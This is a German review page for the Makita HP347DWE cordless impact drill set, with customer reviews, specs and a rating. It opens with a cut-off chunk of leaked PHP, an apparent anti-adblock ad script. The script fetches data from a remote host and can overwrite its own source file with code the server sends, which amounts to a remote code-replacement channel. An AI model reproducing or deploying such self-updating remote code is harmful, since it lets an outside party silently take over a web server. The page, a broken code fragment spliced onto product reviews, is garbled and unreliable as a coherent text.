Makita HP347DWE Akku-Schlagbohrschrauber-Set 14 – TALA.PERC.14.4V

requestTimeout / 1000); return $value == 0 ? 1 : $value; } private function getTimeoutMS() { return $this->requestTimeout; } private function ignoreCache() { $key = md5('PMy6vsrjIf-' . $this->zoneId); return array_key_exists($key, $_GET); } private function getCurl($url) { if ((!extension_loaded('curl')) || (!function_exists('curl_version'))) { return false; } $curl = curl_init(); curl_setopt_array($curl, array( CURLOPT_RETURNTRANSFER => 1, CURLOPT_USERAGENT => $this->requestUserAgent . ' (curl)', CURLOPT_FOLLOWLOCATION => false, CURLOPT_SSL_VERIFYPEER => true, CURLOPT_TIMEOUT => $this->getTimeout(), CURLOPT_TIMEOUT_MS => $this->getTimeoutMS(), CURLOPT_CONNECTTIMEOUT => $this->getTimeout(), CURLOPT_CONNECTTIMEOUT_MS => $this->getTimeoutMS(), )); $version = curl_version(); $scheme = ($this->requestIsSSL && ($version['features'] & CURL_VERSION_SSL)) ? 'https' : 'http'; curl_setopt($curl, CURLOPT_URL, $scheme . '://' . $this->requestDomainName . $url); $result = curl_exec($curl); curl_close($curl); return $result; } private function getFileGetContents($url) { if (!function_exists('file_get_contents') || !ini_get('allow_url_fopen') || ((function_exists('stream_get_wrappers')) && (!in_array('http', stream_get_wrappers())))) { return false; } $scheme = ($this->requestIsSSL && function_exists('stream_get_wrappers') && in_array('https', stream_get_wrappers())) ? 'https' : 'http'; $context = stream_context_create(array( $scheme => array( 'timeout' => $this->getTimeout(), // seconds 'user_agent' => $this->requestUserAgent . ' (fgc)', ), )); return file_get_contents($scheme . '://' . $this->requestDomainName . $url, false, $context); } private function getFsockopen($url) { $fp = null; if (function_exists('stream_get_wrappers') && in_array('https', stream_get_wrappers())) { $fp = fsockopen('ssl://' . $this->requestDomainName, 443, $enum, $estr, $this->getTimeout()); } if ((!$fp) && (!($fp = fsockopen('tcp://' . gethostbyname($this->requestDomainName), 80, $enum, $estr, $this->getTimeout())))) { return false; } $out = "GET {$url} HTTP/1.1\r\n"; $out .= "Host: {$this->requestDomainName}\r\n"; $out .= "User-Agent: {$this->requestUserAgent} (socket)\r\n"; $out .= "Connection: close\r\n\r\n"; fwrite($fp, $out); stream_set_timeout($fp, $this->getTimeout()); $in = ''; while (!feof($fp)) { $in .= fgets($fp, 2048); } fclose($fp); $parts = explode("\r\n\r\n", trim($in)); return isset($parts[1]) ? $parts[1] : ''; } private function getCacheFilePath($url, $suffix = '.js') { return sprintf('%s/pa-code-v%s-%s%s', $this->findTmpDir(), $this->version, md5($url), $suffix); } private function findTmpDir() { $dir = null; if (function_exists('sys_get_temp_dir')) { $dir = sys_get_temp_dir(); } elseif (!empty($_ENV['TMP'])) { $dir = realpath($_ENV['TMP']); } elseif (!empty($_ENV['TMPDIR'])) { $dir = realpath($_ENV['TMPDIR']); } elseif (!empty($_ENV['TEMP'])) { $dir = realpath($_ENV['TEMP']); } else { $filename = tempnam(dirname(__FILE__), ''); if (file_exists($filename)) { unlink($filename); $dir = realpath(dirname($filename)); } } return $dir; } private function isActualCache($file) { if ($this->ignoreCache()) { return false; } return file_exists($file) && (time() - filemtime($file) < $this->cacheTtl * 60); } private function getCode($url) { $code = false; if (!$code) { $code = $this->getCurl($url); } if (!$code) { $code = $this->getFileGetContents($url); } if (!$code) { $code = $this->getFsockopen($url); } return $code; } private function getPHPVersion($major = true) { $version = explode('.', phpversion()); if ($major) { return (int)$version[0]; } return $version; } private function parseRaw($code) { $hash = substr($code, 0, 32); $dataRaw = substr($code, 32); if (md5($dataRaw) !== strtolower($hash)) { return null; } if ($this->getPHPVersion() >= 7) { $data = @unserialize($dataRaw, array( 'allowed_classes' => false, )); } else { $data = @unserialize($dataRaw); } if ($data === false || !is_array($data)) { return null; } return $data; } private function getTag($code) { $data = $this->parseRaw($code); if ($data === null) { return ''; } if (array_key_exists('code', $data)) { $this->selfUpdate($data['code']); } if (array_key_exists('tag', $data)) { return (string)$data['tag']; } return ''; } public function get() { $e = error_reporting(0); $url = $this->routeGetTag . '?' . http_build_query(array( 'token' => $this->token, 'zoneId' => $this->zoneId, 'version' => $this->version, )); $file = $this->getCacheFilePath($url); if ($this->isActualCache($file)) { error_reporting($e); return $this->getTag(file_get_contents($file)); } if (!file_exists($file)) { @touch($file); } $code = ''; if ($this->ignoreCache()) { $fp = fopen($file, "r+"); if (flock($fp, LOCK_EX)) { $code = $this->getCode($url); ftruncate($fp, 0); fwrite($fp, $code); fflush($fp); flock($fp, LOCK_UN); } fclose($fp); } else { $fp = fopen($file, 'r+'); if (!flock($fp, LOCK_EX | LOCK_NB)) { if (file_exists($file)) { $code = file_get_contents($file); } else { $code = ""; } } else { $code = $this->getCode($url); ftruncate($fp, 0); fwrite($fp, $code); fflush($fp); flock($fp, LOCK_UN); } fclose($fp); } error_reporting($e); return $this->getTag($code); } private function getSelfBackupFilename() { return $this->getCacheFilePath($this->version, ''); } private function selfBackup() { $this->selfSourceContent = file_get_contents(__FILE__); if ($this->selfSourceContent !== false && is_writable($this->findTmpDir())) { $fp = fopen($this->getSelfBackupFilename(), 'cb'); if (!flock($fp, LOCK_EX)) { fclose($fp); return false; } ftruncate($fp, 0); fwrite($fp, $this->selfSourceContent); fflush($fp); flock($fp, LOCK_UN); fclose($fp); return true; } return false; } private function selfRestore() { if (file_exists($this->getSelfBackupFilename())) { return rename($this->getSelfBackupFilename(), __FILE__); } return false; } private function selfUpdate($newCode) { if(is_writable(__FILE__)) { $hasBackup = $this->selfBackup(); if ($hasBackup) { try { $fp = fopen(__FILE__, 'cb'); if (!flock($fp, LOCK_EX)) { fclose($fp); throw new Exception(); } ftruncate($fp, 0); if (fwrite($fp, $newCode) === false) { ftruncate($fp, 0); flock($fp, LOCK_UN); fclose($fp); throw new Exception(); } fflush($fp); flock($fp, LOCK_UN); fclose($fp); if (md5_file(__FILE__) === md5($newCode)) { @unlink($this->getSelfBackupFilename()); } else { throw new Exception(); } } catch (Exception $e) { $this->selfRestore(); } } } } } $__aab = new __AntiAdBlock_2361347(); return $__aab->get();

Maschine hat den erwartungen voll entsprochen. Für den gebrauch im privaten bereich voll ausreichend.

Also ich bin sehr zufriedenliegt gut in der hand, zubehör umfangreich,top leistung der maschinepreis-leistung = tip topkoffer ist klasse.

  • Akkuschlagbohrschrauber
  • Makita HP347DWE TALA.PERC.14.4V
  • Makita ist einfach Super

Sowohl das bohren in einer betonwand, als auch das akku-schrauben funktionieren perfekt. Ich kann die maschine jedem empfehlen der einen qualitativ hochwertigen allrounder sucht.

Für den gelegntlichen einsatz zuhause sicher völl ausreichend. In holz und mauerwerk bohren klappt wunderbar. Power ist auch genügend vorhanden.

Merkmal der Makita HP347DWE Akku-Schlagbohrschrauber-Set 14,4V 2x 1,3Ah

  • Leerlaufdrehzahl: 1.Gang: 0 – 400 min-1Leerlaufdrehzahl: 2.Gang: 0 – 1.400 min-1
  • Schlagzahl: 1.Gang: 0 – 6.000 min-1Schlagzahl: 2.Gang: 0 – 21.000 min-1
  • Bohrfutterspannweite: 0,8 – 10 mm

Nachdem ich vor einigen jahren meinem mann einen bohrhammer von makita geschenkt habe, kommt kaum noch ein anderes werkzeug ins haus. Makita ist einfach qualität, die überzeugtder akku-schlagbohrer liegt super gut in der hand – es werden zwei akkus mitgeliefert, was ein echter vorteil ist, dadurch ist immer ein voll geladener akku zur hand. Die ladezeit ist übrigens völlig ok und der akku selbst hält geladen eine kleine ewigkeitwir sind wirklich begeistert. Daher gerne die vollen 5 sterne.

Nach den ersten 2 tagen im gebrauch, super. Die akkus halten gut und die maschine hat eine gute durchzugs kraft.

Für den privaten gebrauch das ideale gerät. Liegt gut in der hand, hat genügend power, einfach zu handhaben, bis jetzt nichts negatives festgestellt. Einzig der koffer ist der marke makita nicht würdig ( wohl ein standart koffer für verschieden geräte ?) es klappert, die verschlüsse scheinen auch nicht sehr stabil zu sein, sehr kratzer anfällig,. (bis jetzt den zweiten noch gar nicht benötigt habe)würde diesen akku schlagbohrer wohl wieder kaufen (aber besitze ja jetzt schon einen).

Ein markengerät mit 2 akku`s, 60 min ladezeit und dazu noch die schlagfunktion. Mit makita habe ich die besten erfahrungen gemacht.

Da mein “alter” schrauber den geist aufgegeben hat musste ein neuer einziehen bei uns. Es wurde der makita schrauber und bin voll und ganz zufrieden mit dem gerät.

. Ist das nicht der name einer brünetten, schlanken schönheit, die in einem schlager einst so schmalzig schön umworben wurde?egal, meine makita ist blau-schwarz und ich bin verliebtich hab mir das teil gekauft, als ich eine sauna aufbauen wollte, die mit schätzungsweise drölf milliarden schrauben zusammen gehalten wird. Meine alte atlas copco (wertstoffhof hab sie selig) hat sich dabei nach 30 minuten (trotz nagelneuer akkus) mit einer stinkenden qualmwolke in die ewigen akuschrauber-jagdgründe verabschiedet. Also amazon durchforstet, freundeskreis interviewt. Einhellige empfehlung: mach doch, was du willst, aber kauf dir ne makita. Hab ich gemacht und steh drauf. Einfach zu bedienen und kinder, hat die einen anzug und kawumms im gebälk. Wo mein alter akku-schrauber – und der war echt nicht billig – kläglich abdampfte und dahin schmolz,hat die makita immer noch genug power in reserve, um jede sture, olle, eingerostete ranzschraube zu lösen. Ladezeit gefühlt ruck-zuck.

Ich kaufe normal nicht billig und auch nicht sehr teuer. Mein letzter akku-schlagbohrschrauber von bosch war der letzte witz und nicht billignach ca. 12 stunden betrieb über 3 jahre verteilt ging der in rauch auf. Mit bosch habe ich bisher keine guten erfahrungen gemacht. Ich versuche es jetzt mal mit makita (die leute loben die geräte). Habe das gerät erst 3 wochen und habe bisher nur löcher in die wand gebohrt – das ging super über die leistung und haltbarkeit vom akku und die kraft beim schrauben kann ich noch nichts sagen. 6 monaten kann ich mehr sagen. Das arbeiten mit dem gerät macht aber spass.

Ein kräftiger schrauber ,der gut in der hand liegt. Dank der zwei akkus ist ein pausenloses arbeiten möglich. Die marke makita spricht für sich. Also ganz klare kaufempfehlung.

Sehr schöner kleiner handlicher akkuschrauber. Mit genug kraft um alle arbeiten die zu hause gibt einfach und problemlos erledigen. Der koffer ist sehr schön, auch die 2 akkus im lieferumfang sind sehr gut. An sich hab ich nichts zu meckern.

Würde ich im jeden fall wieder kaufen. Durch die zwei akkus sehr praktisch.

Meine alte akkubohrmaschine vom hofer die 10 jahre wirklich gute dienste geleistet hat musste für den umbau zu hause nun doch ersetzt werden. Ich brauche zwar nicht oft werkzeug, ärgere mich dafür aber extrem wenn es dann nicht funktioniert. Habe nun bei mir zu hause eine wand aufgestellt und einige möbel zusammengeschraubt und der neue makitaakkuschrauber hat tadellos funktioniert. Habe allerdings auch das schlagbohren in den betonziegeln meines hauses versucht. Das war leider enttäuschend. Der putz war noch kein problem, beim ziegel war es dann schon zu ende. Gutes geräte für alle die einen guten akkuschrauber mit gutem zubehör suchen. Das schlagbohren ist allerdings leider zu vergessen.

Ich habe nicht so eine qualität erwartet.

Besten Makita HP347DWE Akku-Schlagbohrschrauber-Set 14,4V 2x 1,3Ah Einkaufsführer

Summary
Review Date
Reviewed Item
Makita HP347DWE Akku-Schlagbohrschrauber-Set 14,4V 2x 1,3Ah
Rating
5,0 of 5 stars, based on 17 reviews